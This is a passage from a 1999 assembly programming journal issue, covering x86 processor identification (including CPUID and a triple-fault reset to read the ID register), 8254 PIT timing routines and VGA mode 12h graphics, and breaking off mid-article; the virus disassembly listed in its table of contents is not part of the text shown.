::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. Oct/Nov 99 :::\_____\::::::::::. Issue 6 ::::::::::::::::::::::......................................................... A S S E M B L Y P R O G R A M M I N G J O U R N A L http://asmjournal.freeservers.com asmjournal@mailcity.com T A B L E O F C O N T E N T S ---------------------------------------------------------------------- Introduction...................................................mammon_ "Processor Identification"........................Chris.Dragan.&.Chili "Timing with the 8254 PIT"...............................Jan.Verhoeven "Programming the Universal Graphics Mode"................Jan.Verhoeven "Conway's Game of Life".................................Laura.Fairhead "'Ambulance Car' Disassembly"....................................Chili "'Ambulance Car' Disinfector"....................................Chili "Assembling for PIC's"...................................Jan.Verhoeven "Splitting Strings"............................................mammon_ "String to Numeric Conversion"..........................Laura.Fairhead Column: Win32 Assembly Programming "WndProc, The Dirty Way".................................X-Calibre "Programming the DOS Stub"...............................X-Calibre Column: The Unix World "Using ioctl()"............................................mammon_ Column: Assembly Language Snippets "BinToString"....................................Cecchinel Stephan Column: Issue Solution "Absolute Value"....................................Laura.Fairhead ---------------------------------------------------------------------- ++++++++++++++++++Issue Challenge+++++++++++++++++ Find the Absolute Value of a Register in 4 Bytes ---------------------------------------------------------------------- ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::..............................................INTRODUCTION by mammon_ Customarily I'll start with the bad news: this issue is about a week late, primarily because I had forgotten about the two Win32 articles X-Calibre passed on to me a month or two ago. The good news, however, is that there may be a December issue; currently I have about 5 or so extra articles that threatened to bump this issue over the 200K mark. Evenutally I may have a chance to be late on a monthly basis... This issue has a bit of a 'back to the basics' feel about it. Packed inside are articles dealing with some of the 'classics' of assembly: CPU identific- ation, graphics, and the ever-popular Game of Life. The disassembly of the Ambulance Car virus also has an old-school feeling to it, hearkening back to the old days of DOS and com files. Additional highlighs include X-Calibre's 'bending windows to your will' Win32 articles, two excellent chip programming articles from Jan, utility routines from Laura and myself, and of course my usual attempt to defend assembly as a viable programming language for the Unix environment. Enough commentary; time to get this mag on the road! ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Processor Identification by Chris Dragan & Chili Being able to identify the processor in which your program is running, can be a very useful feature, if not to ensure that your program will work on a wider range of computers, at least to provide minimum compatibility and guarantee it not to crash on some processors. The first part of this article explains how to distinguish between older 80486 and lower processors by checking for known behaviours, while the second part (written by Chris) takes it one step forward, explaining how to use the CPUID instruction on newer processors, checking the ID register by means of a TFR and how to correctly identify a Cyrix processor. EFLAGS Register --------------- On old pre-286 CPUs, bits 12 through 15 of the FLAGS register are always set, so we can check for this type of processor, in opposition to newer ones, by attempting to clear those bits: pushf pop ax and ax, 0fffh ; clear bits 12-15 push ax popf pushf pop ax and ax, 0f000h cmp ax, 0f000h ; check if bits 12-15 are set je _is_an_older_cpu jne _is_a_286_or_higher Once we know that we are at least on a 286 processor, we can then check to see if we're on a 32-bit processor (386 or higher) or on an actual 286. For this purpose we know that bits 12-15 of the FLAGS register are always clear on a 286 processor in real mode: pushf pop ax or ax, 0f000h ; set bits 12-15 push ax popf pushf pop ax and ax, 0f000h ; check if bits 12-15 are clear jz _is_a_286 jnz _is_a_386_or_higher If instead, the processor is running in protected mode these bits are used for the IOPL (bits 12-13) and NT (bit 14) flags. Note that bits 12-14 hold the last value loaded into them on 32-bit processors in real mode. Also remember that there is no virtual-8086 mode on 16-bit processors. In order to find out if the processor is in real or protected mode we must test if the Protection Enable flag (bit 0 of CR0) is set, if so then we're in protected mode: smsw ax and ax, 0001h ; check if bit 0 (PE) is clear jz _real_mode jnz _protected_mode To find out if it is a 486 or a newer processor we'll try to set the AC flag (bit 18), since it is always clear on a 386 processor (also NexGen Nx586), unlike newer ones that allow it to be toggled: pushfd pop eax mov ebx,eax xor eax,40000h ; toggle bit 18 push eax popfd pushfd pop eax xor eax,ebx ; check if bit 18 changed jz _is_a_386 jnz _is_a_486_or_higher And finally to check if we're in an old 486 or in a new 486 and other newer processors (i.e. Pentium), we'll try to toggle the ID flag (bit 21) which indicates the presence of a processor that supports the CPUID instruction. This part is explained below in a section about CPUID. PUSH SP Instruction ------------------- Before the 286, processors implemented the "PUSH SP" instruction in a different way, updating the stack pointer before the value of SP is pushed onto the stack, unlike newer processors which push the value of the SP register as it existed before the instruction was executed (both in real and virtual-8086 modes). Older CPUs 286+ { { SP = SP - 2 TEMP = SP SS:SP = SP SP = SP - 2 } SS:SP = TEMP } (credit for the PUSH SP algorithm representation goes to Robert Collins) So all one has to do is see if the values of the SP register are different before and after the PUSH SP: push sp pop ax cmp ax, sp ; check if SP values differ je _is_a_286_or_higher jne _is_an_older_cpu Note - If you want the same result on all processors, use the following code instead of a PUSH SP instruction: push bp mov bp, sp xchg bp, [bp] Shift and Rotate Instructions ----------------------------- Starting with the 186/88, all processors mask shift/rotate counts by modulo 32, restricting the maximum count to 31 (in all operating modes, including the virtual-8086 mode). Earlier CPUs do not mask the shift/rotation count, using all 8-bits of CL. So, if we try to perform a 32-bit shift, on newer processors we'll end up with the same result (since the shift count is masked to 0), whereas on an older processor the result will be zero: mov ax, 0ffffh mov cl, 32 shl ax, cl ; check if result is zero jz _is_an_older_cpu jnz _is_a_18x_or_higher MUL Instruction --------------- NEC processors differ from Intel's with respect to the handling of the zero flag (ZF) during a MUL operation. While a NEC V20/V30 does not clear ZF after a non-zero multiplication result, but only according to it, an Intel 8086/88 will always clear it (note that this is only true for the specified processors): xor al, al ; force ZF to set mov al, 40h mul al ; check if ZF is clear jz _is_a_NEC_V20_V30 jnz _is_an_Intel_808x In addition to the list of sites where you can find more information, provided by Chris at the end of this article, you can also try this one: http://grafi.ii.pw.edu.pl/gbm/x86/ (Grzegorz Mazur) And also the following packages/programs (available somewhere in the net): The Undocumented PC (Frank van Gilluwe) HelpPC (David Jurgens) 80x86.CPU file (Christian Ludloff) ID Register ----------- Beginning with the 80386 processor, Intel included a so-called ID register, which contains information about the processor model and stepping. This register is accessible in an unusual way - it is passed in DX after reset. To read the ID register one must proceed the following steps: 1. By storing value 0Ah (resume with jump) at address 0Fh (reset code) in the CMOS data area, inform BIOS not to issue POST after reset, but to return the control to the program. 2. Update after-reset-far-jump address at 0040h:0067h. 3. Set shutdown status word (0040h:0072h) to 0, to avoid undesirable side-effects. 4. Cause a reset. Causing a reset is typically done by issuing a so-called triple-fault-reset, i.e. causing an error from which the processor cannot recover and enters a reset state. TFR (triple...) can be done only if we have enough control over the processor, i.e. under plain DOS in real mode (no EMS) or under Win'95 (this is risky). The following code shows how to do it in DOS. The code is assumed to be in a COM program. ;------------------------------------------------------------------------------ section .data GDT dd 0, 0 ; Selector 0 is empty dd 0000FFFFh, 00009A00h ; Selector 8 - code segment GDTR dw 000Fh, 0, 0 ; Limit 0Fh - two selectors IDTR dw 0, 0, 0 ; Empty IDT will cause TFR section .text ; Ensure that we are in real mode, not in V86 smsw ax and al, 1 jnz near _skip_tfr_since_in_v86_mode ; Update code descriptor as we are going to enter pmode xor eax, eax mov ax, cs shl eax, 4 or [GDT+10], eax add eax, GDT mov [GDTR+2], eax ; Update reset code in CMOS data area cli ; Disable interrupts mov [SaveSP], sp ; Save stack pointer mov al, 0Fh ; Address 0Fh in CMOS area out 70h, al times 3 jmp short $+2 ; Short delay mov al, 0Ah ; Value 0Ah - far jump out 71h, al ; Update resume address push word 0 pop es mov [es:0467h], word _tfr ; offset mov [es:0469h], cs ; segment mov [es:0472h], word 0 ; Update shutdown status ; Switch to pmode lgdt [GDTR] ; Load GDT lidt [IDTR] ; Load empty IDT smsw ax or al, 01h ; Set pmode bit lmsw ax jmp 0008h:_reset ; Reload CS _reset: mov ax, [cs:0FFFFh] ; Reach beyond segment limit ; After reset we are here with DX containing the ID register _tfr: cli mov ax, cs mov ds, ax mov es, ax mov ss, ax mov sp, [SaveSP] sti ;------------------------------------------------------------------------------ Of course there are also other ways of reading the ID register. They are well described in DDJ (www.x86.org). As said before, the ID register contains information about processor model and stepping. The format of the register is as follows: bits 15..12 - stepping bits 11..8 - model bits 7..0 - revision Some example ID register values: 0303 i386DX 2303 i386SX 3301 i376 This format of the ID register was used in Intel 386 processors (all except RapidCAD), AMD 386 processors and most of IBM 486 processors. Another format of the ID register was introduced with Intel 486 processors. This format is similar to the format of CPUID model information (see below), and until the Pentium was kept the same. However newer processors do not keep any useful information in the ID register (it is usually 0). This also concerns Cyrix 486 processors. bits 15..14 - unused, zero bits 13..12 - typically indicate overdrive bits 11..8 - model bits 7..4 - stepping bits 3..0 - revision And some example ID register values with this format for Intel processors: 0401 i486DX-25/33 0421 i486SX 0451 i486SX2 Cyrix DIR --------- All Cyrix processors have a Device-Identification-Registers, which are used to identify these processors. To read DIRs, one first has to determine that he uses a Cyrix processor. This can be accomplished in two ways: 1. On modern processors using CPUID instruction. 2. On first Cyrix processors issuing 5/2 method. If there is no CPUID instruction, one has to use the other way of determination. If one knows that he is on a 486 processor, he can use the following code: mov ax, 0005h mov cl, 2 sahf div cl lahf cmp ah, 2 je _we_are_on_cyrix jne _this_is_not_cyrix Once we have determined we are on a Cyrix processor, we can read its DIRs to get its model and stepping information. All Cyrix processors have their special registers accessible through ports 22h and 23h. Port 22h keeps register number and port 23h register value. ; This function reads a Cyrix control register ; It expects a register address in AL and returns value also in AL ReadCCR: out 22h, al ; select register times 3 jmp short $+2 ; delay in al, 23h ; get register contents ret DIRs have offsets 0FEh (DIR1) and 0FFh (DIR0). DIR1 contains revision, while DIR0 contains model/stepping. The following code reads them: mov al, 0FEh call ReadCCR mov [DIR1], al mov al, 0FFh call ReadCCR mov [DIR0], al Example DIR0 values: 1B Cx486DX2 31 6x86(L) clock x2 55 6x86MX clock x4 CPUID Instruction ----------------- All newer processors have the CPUID instruction, which helps to identify on what processor we are. Before using it, we must first determine if it is supported, by flipping the ID flag (bit 21 of EFLAGS). pushfd pop eax xor eax, 00200000h ; flip bit 21 push eax popfd pushfd pop ecx xor eax, ecx ; check if bit 21 was flipped jnz _cpuid_supported jz _no_cpuid The only problem may be that NexGen processors do not support the ID flag, but they do support the CPUID instruction. To determine that, we must hook Invalid Opcode exception (int6) and execute the instruction. If the exception is triggered, CPUID is not supported. Also some early Cyrix processors (namely 5x86 and 6x86) have the CPUID instruction disabled. To enable it, we must first enable extended CCRregisters and then enable the instruction, setting bit 7 in CCR4. ; Enable extended CCRs mov al, 0C3h ; C3 corresponds to CCR3 call ReadCCR and ah, 0Fh ; bits 7..4 of CCR3 <- 0001b or ah, 10h call WriteCCR ; Enable CPUID mov al, 0E8h ; E8 corresponds to CCR4 call ReadCCR or ah, 80h ; bit 7 enables CPUID call WriteCCR The following functions are used to read/write CCRs: ReadCCR: out 22h, al ; Select control register times 3 jmp short $+2 xchg al, ah in al, 23h ; Read the register xchg al, ah ret WriteCCR: out 22h, al ; Select control register times 3 jmp short $+2 mov al, ah out 23h, al ; Write the register ret After enabling CPUID we must test if it is supported by flipping the ID flag, unless of course we have determined that we are not on a 5x86 or 6x86 by reading DIRs. Once we have determined that CPUID is supported, we can use it to identify the processor. The instruction expects EAX to hold a function number and returns information corresponding to this number in EAX, ECX,EDX and EBX. The two most important levels are listed below. level 0 (eax=0) returns: eax Maximum available level ebx:edx:ecx Vendor ID in ASCII characters Intel - "GenuineIntel" (ebx='Genu', bl='G'(47h)) AMD - "AuthenticAMD" Cyrix - "CyrixInstead" Rise - "RiseRiseRise" Centaur - "CentaurHauls" NexGen - "NexGenDriven" UMC - "UMC UMC UMC " level 1 (eax=1) returns: eax bits 13..12 0 - normal 1 - overdrive 2 - secondary in dual system bits 11..8 model bits 7..4 stepping bits 3..0 revision If Processor Serial Number is enabled, all 32 bits are treated as the high bits (95..64) of the number. edx Processor features (e.g. bit 23 indicates MMX) There are also other levels, i.e. level 2 returns cache and TLB descriptors, level 3 the rest of Processor Serial Number. Other processors (AMD, Cyrix) also support extended levels. The first extended level is 80000000h and it returns in EAX the maximum extended level. These extended levels return information specific to that processors, e.g. 3DNow! support or processor name. This example code determines MMX support: ; First check maximum available level xor eax, eax ; eax = 0 (level 0) cpuid cmp eax, 0 jng _no_higher_levels ; Now check MMX support mov eax, 1 ; level 1 cpuid test edx, 00800000h ; bit 23 is set if MMX is supported jnz _mmx_supported jz _no_mmx As this is not the place for listing all the available information about what values are returned by CPUID, ID register or DIRs, you should get the most recent information from the processor vendors: www.intel.com www.amd.com www.cyrix.com Also you can find very valuable information about the identification topic on: www.sandpile.org www.x86.org www.cs.cmu.edu/~ralf/files.html ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Timing with the 8254 PIT by Jan Verhoeven Some time ago I saw a note on the mailinglist from someone in need for a flexible timer function. For this, there are several concepts. First, there is the timertick which is updated every 55 ms. For long time delays, this is the best method. Just read the timervalue at 0000:046C, add the desired delay (in 55 ms intervals) and wait until the timer reaches that value. A second approach is to use modern BIOS-ses which have a timingfunction in BIOS interrupt 15h, but this is "only" present on machines from 1990 or later. A third approach is to reprogram the RTC chip. No big deal, and there's a very accurate timer in it (upto 8 kHz) which even has interrupt capabillities for automated functions and simple multitaskings. But by far the best way (and most universal and accurate) is to use the "spare" timer in your PC's 8254 chip. This chip can be put in many operating modes, but we want it to do the following: - start counting at a certain value - count down - latched reading mode - no influence on further PC operation The counting sequence for the PC is as follows: - there are 2^16 BIOS-timervalue updates per hour - there are 2^16 8254 clockpulses per timertick So, there are 2^32 clockpulses per hour. This boils down to one clock pulse being around 838 ns. Not bad. In order to make things very clear I use Modula-2 to show how the routines are coded. Modula is an extremely structured language, so I use it as a kind of Meta-Assembler or Pseudo-Assembler. For those not too familiar with Modula: a CARDINAL is not an old man in a dress, but a 16 bit unsigned integer. Here comes..... ---------- OpenTimer ---------------------------- Start ---------- PROCEDURE OpenTimer; (* open timer chip in mode 2 *) BEGIN ASM MOV AL, 34H OUT 43H, AL XOR AL, AL OUT 40H, AL OUT 40H, AL END; END OpenTimer; ---------- OpenTimer ----------------------------- End ----------- The value 34h is constructed as follows: bit function ----- --------------------------- 6 - 7 select counter (0 - 3) 4 - 5 Read/write mode 1 - 3 Select countermode 0 Binary or BCD For this case we selected: - counter 00 - read/write two bytes from/to counterchip - Mode 2 - binary values These few lines open the timer in "Mode 2" and prime the down counting register to 0000. I would love to elaborate on the code, but this is all which is needed.... It is kind of handy if you restore the state of your machine after your application stops using the CPU. Therefore there is the following function to restore "normal" operation of this channel. ---------- CloseTimer --------------------------- Start ---------- PROCEDURE CloseTimer; (* close timer chip *) BEGIN ASM MOV AL, 36H OUT 43H, AL XOR AL, AL OUT 40H, AL OUT 40H, AL END; END CloseTimer; ---------- CloseTimer ---------------------------- End ----------- This function just restores the timer to it's default mode and clears the counting registers. The value "36h" means: - counter 00 - read/write two bytes from/to counterchip - Mode 3 - binary values ---------- ReadTimer ---------------------------- Start ---------- PROCEDURE ReadTimer () : CARDINAL; (* read timer *) VAR Time : CARDINAL; BEGIN ASM MOV AL, 6 OUT 43H, AL IN AL, 40H MOV AH, AL IN AL, 40H XCHG AH, AL MOV [Time], AX END; RETURN Time; END ReadTimer; ---------- ReadTimer ----------------------------- End ----------- After we opened the timer, it might be a good idea to also use it. This is done in a two-step operation: - current value of counting register is stored in On-Chip buffer - the low byte is read in first - the high byte is read in second - low and high byte are put in right order Make sure you always read in TWO bytes, else you will run into framing errors. Also keep in mind that this is a DOWN-COUNTER! The value "6" which is sent to the 8254 first might be wrong, but in all my software it just works fine. It selects Channel 0 to be latched. The lower four bits of this word should be "don't care" bits, but I prefer "not to fix a running program". ---------- MilliSeconds ------------------------- Start ---------- PROCEDURE MilliSeconds (ms : CARDINAL); VAR MaxCount : CARDINAL; BEGIN MaxCount := 65535 - ms * 1193; OpenTimer; WHILE ReadTimer () > MaxCount DO (* Nothing! *) END; CloseTimer; END MilliSeconds; ---------- MilliSeconds -------------------------- End ----------- This function has some deliberate errors inside. I calculate MaxCount such that it is too big. Reason: in Modula I do not control math operations as well as in ASM (of course!) That's why I subtract the value from 65,535 instead of 65,536. In ASM I would have used a NOT operation, but for Modula this is good enough. Furthermore I use the number 1193 to go from counting pulses to milliseconds. It's a not too big number so it is good enough to use in integer arithmatics. This "MilliSeconds" routine is a dumb waiting-procedure. It calculates a stop-value for the counter, initialises the counter to mode 2 and value 0000 and then waits until the timer reaches there. Next it closes the timer and it's all over. The next function, which was made for diagnostic purposes, shows that in an application you would have to correct for the ---------- TestTimer ---------------------------- Start ---------- PROCEDURE TestTimer; VAR First, Last, Delta, k : CARDINAL; BEGIN OpenTimer; First := ReadTimer (); WriteCard (First, 6); Write (Tab); FOR k := 1 TO 10000 DO (* Nothing! *) END; Last := ReadTimer (); Delta := First - Last; WriteCard (Delta, 6); WriteLn; CloseTimer; END TestTimer; ---------- TestTimer ----------------------------- End ----------- You could use this routine to calibrate a timingloop, but on modern PC architectures this could well lead to disasters. Modern CPU's are so damned fast, that your loopcounter will overflow. Therefore this calibration technique is only useful for modifying inherently slow routines, like those using I/O operations. For some reason, I/O operations still need around one microsecond each, so these will slow down the routine enough to make sure there will be no overflow in the loop-counters. A friend of mine just uses IN instructions from some silly address to get reasonably accurate timingloops, assuming that 1 IN operation is about 1 microsecond. Bit it could well lead to trouble on modern PCI hardware. All in all, for most delay-routines, the dumb waiting function is by far the best since it is the most reliable and accurate to less than a microsecond. But if you need this many digits, use compensated software, that takes into account the time to read the timers twice -- because you need to keep in mind that also this routine relies heavily on I/O instructions, so it is not infinitely fast! In a future article I will describe how to use the RTC chip for generating timing signals and how to use it via the Programmable Interrupt Controller in automatic mode. That article will be pure ASM again, so don't be worried about this detour into Modula. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Programming for the one and only universal graphics mode by Jan Verhoeven If you need to write a graphics routine that has a reasonable resolution and which is nearly always present, there is just one choice: mode 12h or the well known 640 x 480 x 16. This mode is the highest resolution mode which is always available in all VGA cards. 800 x 600 is better but it either needs a VESA driver installed or the user must himself figure out how to switch the machine to that mode. Not an easy task for the majority of "experienced Windows users" (isn't this a paradox?). Mode 12h is treated as a worst case by many Superior Operating Systems. But for most purposes it is just fine. It's fast, reasonably easy to use and it is omni present. That's why I decided to port my textmode windows to this graphics mode. The application. ---------------- I built a simple AD converter that measures voltages and converts them into digits. The ADC fits on a COM port and is completely controlled from software. The idea was to have different reference voltages, sample rates, scaling factors, a bar graph display and a 4 digit LED-style read-out. And in the bottom window there is a "recorder" that plots pixels in real-time. If all parts have been explained I might post the full package (the sources, the schematics and such) so that everyone can build one for your own. How to switch to Mode 12h? -------------------------- Going to mode 12h is easy. Just use the BIOS interrupt 10h as follows: mov ax, 012 int 010 and you're in. Remember, I use A86 syntax, so all numbers starting with a nought are considered hexadecimal. Plotting in a graphics screen. ------------------------------ Now that we're in Mode 012, we should also try to fill that clear black rectangle. But first we should define a way of remembering WHERE to put our cute little dots. For all my plotting, I use the following structure: -------------------------------- Window Information Block ------ Infoblk1 STRUC Win_X dw ? ; top-left window position, X and ... Win_Y dw ? ; ... Y Win_wid dw ? ; window width and ... Win_hgt dw ? ; ... height CurrX dw ? ; within window, current X-coordinate, ... CurrY dw ? ; ... and Y DeltaX dw ? DeltaY dw ? Indent dw ? ; Indentation for characters in PIXELS! Multiply dw ? ; screenwidth handler Watte01 dw ? ; BoxCol db ? ; border colour TxtCol db ? ; text colour BckCol db ? ; background colour MenuCol db ? ; menu text colour ENDS -------------------------------- Window Information Block ------ It will be clear after looking into this list, that each InfoBlock describes a window, a rectangular portion of the screen, which is treated as a unity. Each window is defined by the topleft (x,y) coordinates and the window width and height. Knowing these four words, the window is defined and fixed on screen. If the window is to be moved, just adjust the topleft (x,y) position. Since it is handy to know where in this window we are plotting, I defined two more X and Y values: "CurrX" and "CurrY". When a request to (un)plot is made, it will start on these coordinates. For line drawing and such there are the "DeltaX" and "DeltaY" variables. The former is for horizontal lines, the latter for vertical lines. Now that we have our fancy window, where we can plot and draw lines, we also need some text to see what it's all supposed to be about. The text is plotted at the CurrX and CurrY postions. Each character is PLOTTED there, so tokens can be put at ANY location on screen, not just on byte boundaries. For nice and easy alignments, I defined the variable "Indent" which defines how many pixels from the left or right margin must remain blank. Since this software should be as easy to adapt to other resolutions as possible, there is a need for a "Multiply" variable. This is filled with the offset address of a dedicated screen multiplier routine. In Mode 012 there are 640 pixels on a line. That's 80 bytes. So in order to calculate the pixel address you need to use the following formula: PixAddr = CurrY * 80 + CurrX / 8 So we need a set of damned fast Mul_80 routines. If needed you can make some of them and at init-time find out the CPU and hardware and assign a suitable routine and fill it in in the Window definition structures. The "Watte01" field is just a filler. Reserved by me. Since the Mode 012 has 16 colours to spare we should also use them. Therefore I set up space for 4 colours: Box-, Text-, Background- and Menu-colours. Each printing routine will make sure the right colour is set. It will be clear that each window is very flexible to use. If the position is wrong, just change a few numbers. Also if the colours are not optimal. And by having several windows assigned to the same area on screen, you can easily build special effects: fullscrn dw 0, 0,640,480, 0, 0, 0, 0, 4, mul_80, 0 db 12, 14, 3, 15 ; main screen window FullScrn just describes the complete screen. It is used for some very general printing an plotting tasks. It starts at topleft (0,0) and is 640 wide and 480 high. ParWin2 dw 5, 30,630,150, 8, 9, 0, 0, 4, mul_80, 0 db 10, 11, 3, 11 ; Parameter window This is a window which is a subwindow of the Full Screen for storing data and parameters. PlotWin dw 5,195,630,260, 0, 0, 0, 0, 4, mul_80, 0 db 9, 15, 3, 7 ; Virtual plotting window This is the Virtual Plotting Window. It has some text, plus the actual plotting window: PlotWin2 dw 6,196,628,256, 0, 0, 0, 0, 4, mul_80, 0 db 9, 15, 3, 7 ; Actual plotting window This is the place where the pixels live. It starts one pixel down/right of the virtual window and also ends one pixel short of it. The reason for making this "dummy" window structure was that this way there is no need for an elaborate checking of extreme ends of the window while erasing pixels. On the extremes of the "Virtual Plotting Window" there are the pixels that make up a nice coloured box. It looks not nice when these lines are erased. And the easiest way to prevent this was by defining two separate windows: one for constructing the box and one for the actual work. The 4 digit LED-style read-out is also controlled by four different windows. Each digit has its own window definition: ------------ Digit Space ------------------------------- Start --- DigSpac1 dw 16, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0 db 9, 11, 14, 3 ; Digital display, digit 1, MSD DigSpac2 dw 56, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0 db 9, 11, 14, 3 ; Digital display, digit 2 DigSpac3 dw 96, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0 db 9, 11, 12, 3 ; Digital display. digit 3 DigSpac4 dw 136, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0 db 9, 11, 12, 3 ; Digital display, digit 4, LSD MSD = Most Significant Digit LSD = Least Significant Digit ------------ Digit Space -------------------------------- End ---- This way it is convenient to allign the digits on screen. As with normal LED- style digits, the seven segments of them are drawn piece by piece. And erased if necessary. As you will know from voltmeters, the MSD is the least likely to change in time and the LSD is most likely to be different between any two samples. So in a way it is necessary to control erasing of just one digit without massive software overheads. Therefore I again chose to use a separate window for each digit. It makes erasing the digit easier and independent of the other three. Something else to observe is, that the two or three digits behind the decimal point have another colour from those before it. This way the user can easily see the approximate magnitude of the number without having to search for a decimal point. This is accomplished easily by having different BckCols in the LSD windows. This all costs a few bytes extra, but it saves a lot of coding. How to quickly load a segment register. --------------------------------------- Segment registers cannot be loaded with immediate data. So you normally put a register on the stack and use that to transfer the constant to the actual segment register. This is not necessary. It can be done much easier like below: VGA_base dw 0A000 ; for ease of loading segment registers And the corresponding code: mov es, [VGA_base] The detour via the stack or via AX takes more cycles and bytes. Defining what to print. ----------------------- In a graphics screen there are an awful lot of places where to store our text. So we need a way to define where to put which tokens. For this I use the following construct: -------------- Topic ----------------------------------- Start --- Topic MACRO ; start of printing message dw #1, #2 db #3, #4 #EM TopicEnd MACRO ; topics stop here dw 0F000 #EM Topic 180, 9, 'Start : ' ParaStrt db 'Manual ', 0 Topic 9, 28, 'Power : ' ParaPowr db 'OFF', 0 Topic 360, 55, 'Group : ' ParaGrup db '16 ', 0 TopicEnd -------------- Topic ------------------------------------ End ---- The Topic Macro puts the first two arguments (the new values for CurrX and CurrY) in the first two WORD positions of the definition table. The actual text is then put in the BYTE positions. In most cases there will be no #4 argument, but A86 doesn't care about that. Each "to-print" table is shut down by an EndTopic Macro. It defines a new CurrX of -4096. That clearly is out of range, so this is end of table. In normal operation, small negative values of CurrX and CurrY are accepted and taken care of, although it can be dangerous to use this feature. Multiplying by 80. ------------------ On all CPU's form the 486, the MUL instruction is single cycle, so it'll be damn fast. For all older CPU's, the following code could mean some significant speed increases: -------------------- Multiply ------------------------ Start ---- mul_80: push bx ; PixAddr in Mode 012 shl ax, 4 mov bx, ax ; bx = 16 x SCR_Y shl ax, 2 ; ax = 64 x SCR_Y add ax, bx ; ax = 80 x SCR_Y pop bx ret -------------------- Multiply ------------------------- End ----- This routine is used over and over again, so a few microseconds more or less will make a big difference. Where to leave our pixels? -------------------------- Suppose you need to plot pixel (3,0). That's an easy one. It will fit in the very first byte of the VGA memory array. It's segment is 0A000 and it's offset is plain 0. But not the full byte, since that would produce a line. No, we need to access bit 4 of byte 0. Yes, the first pixel is bit 7 of byte 0 and the 8th pixel is bit 0 of byte 0. Or, in index-language, CurrX = 0 addresses bit 7, and so on. So we need to invert the screenposition into a bitposition. We'll come to that later. Suppose, by some sheer magic, we succeeded in making that conversion, we still need to tell the VGA which bit is involved. That's done by means of the following routine: --------------------- SetMask ------------------------ Start ------- SetMask: push dx ; ah = mask mov dx, 03CE mov al, 8 out dx, ax ; set bit mask pop dx ret --------------------- SetMask ------------------------- End -------- This is an optimized routine. The VGA is a 16 bit card, so we can use 16 bit I/O instructions for adjacent I/O ports. The construct: mov al, 8 out dx, ax ; set bit mask is identical to: mov al, 8 out dx, al inc dx mov al, ah out dx, al Anyway, the plottingmask is defined to be as loaded in the AH register. We can put any value in AH, not just one pixel, but also "no pixels" and "all pixels". Defining colour in Mode 012. ---------------------------- Colours to use during plotting are defined in a comparable fashion: --------------------- Set Colour --------------------- Start ------- SetColr: push dx ; ah = colour mov dx, 03C4 mov al, 2 out dx, ax ; select page register and colour pop dx ret --------------------- Set Colour ---------------------- End -------- In Mode 013 you just can load a bytevalue colour into a memory location and that's it. So that's an ultrafast resolution, but at the price of resolution. In Mode 012 we define colour with a series of I/O instructions. If a colour got set, it remains active until canceled by another SetColr call. Try to remember this when all on a sudden all kinds of fancy colours start to appear on screen.... Where to put the pixel? ----------------------- I have presented the formula some paragrpahs before this one. Basically we work with virtual coordinates and must translate these to real coordinates before trying to calculate an address. This is done by: ------------------ VGA memory address ---------------- Start ------- VGaddr: ; calculate address in VGA memory mov es, [VGA_base] ; quickly load segment register mov ax, [di.CurrY] ; ax = current Y add ax, [di.Win_Y] ; adjust for window offset call [di.Multiply] ; multiply by bytes per row mov bx, [di.CurrX] ; bx = current X add bx, [di.Win_X] ; adjust for window offset shr bx, 3 ; divide by 8 add bx, ax ; bx = index address into video segment ret ------------------ VGA memory address ----------------- End -------- It's all fairly straightforward. How do we plot pixels in Mode 012? ---------------------------------- This is a silly process. We cannot access all the 4 colour planes at once, so we have used SetColr to define which colourplanes are to be affected. This all is rather complicated. You may either believe me on my word, or consult a 1200 page reference.... Now that we're ready to plot pixels, we do so by the following code: ------------------ VgaPlot -------------------- Start -------------- VgaPlot: mov al, [es:bx] ; Do the actual plotting mov al, [ToPlot] mov [es:bx], al ret ------------------ VgaPlot --------------------- End --------------- The first line is a read command. It notifies the VGA controller about the address of the pixelbyte. The resulting data from the read is of no concern. We immediately replace it with the value of "ToPlot". For plotting there is a value of "FF" in this byte and for erasing there is a "00" in it. After this comes the actual plotting function. The write to the specified address sets the pixels as defined by AL and SetMask. Adding it all up gives the following code to really plot a pixel: -------- PlotPix ------------------------------- Start ----------- PlotPix: push ax, bx, cx, es ; plot a point on screen call VGaddr mov cx, [di.CurrX] ; calculate plottingmask add cx, [di.Win_X] and cx, 0111xB ; cl = position in byte mov ah, 080 shr ah, cl ; now move the high bit backwards... call SetMask ; use it to set mask call VgaPlot ; and do the plotting pop es, cx, bx, ax ret -------- PlotPix -------------------------------- End ------------ That's it to plot a pixel: just a few calls to some procedures we defined earlier on. The msjority of this procedure is comprised of the way to find the actual bit-position in the VGA memory byte. Remember, to plot pixel 0 we need bit 7! Therefore we load CX with the current X value, correct this for the current window position and isolate the lower 3 bits. These indicate the position of the pixel in screenmemory. mov cx, [di.CurrX] ; calculate plottingmask add cx, [di.Win_X] and cx, 0111xB ; cl = position in byte At this point, CL contains the n-th bit in this byte. So I load AH with the binary pattern 10000000 and shift it right until the corresponding bit position is reached: mov ah, 080 shr ah, cl ; now move the high bit backwards... I don't know if there are batches of Intel CPU's that have a problem with the SHR instruction is CL equals zero, but I have not yet noticed any. Lines: series of pixels. ------------------------ There are three kinds of lines: horizontal, vertical and sloped ones. Vertical lines are plotted pixel by pixel since all of them end up in different bytes of VGA memory. Sloped lines are best taken care of by a Bresenham-style line drawing algorithm (although the digital differential analyser is better). Horizontal lines are a different kind of line. In these, several adjacent pixels are plotted. And adjacent pixels mainly are in the same VGA memory byte. Therefore I made two horizontal line drawers. The one for short lines (less than 17 pixels) just plots the pixels one by one. The other algorithm, for lines of 17 pixels or more, tries to fill VGA memory with as much byte writes as possible. Taking care of longer horizontal lines. --------------------------------------- Suppose our line is composed as follows: First 1 2 3 ... K Last ; byte in video memory ......## ######## ######## ###...### ###..... ; # = pixel to be set So our line starts at pixel 6 (i.e. bit 1) of VGA memory byte "First". Next it lasts for N 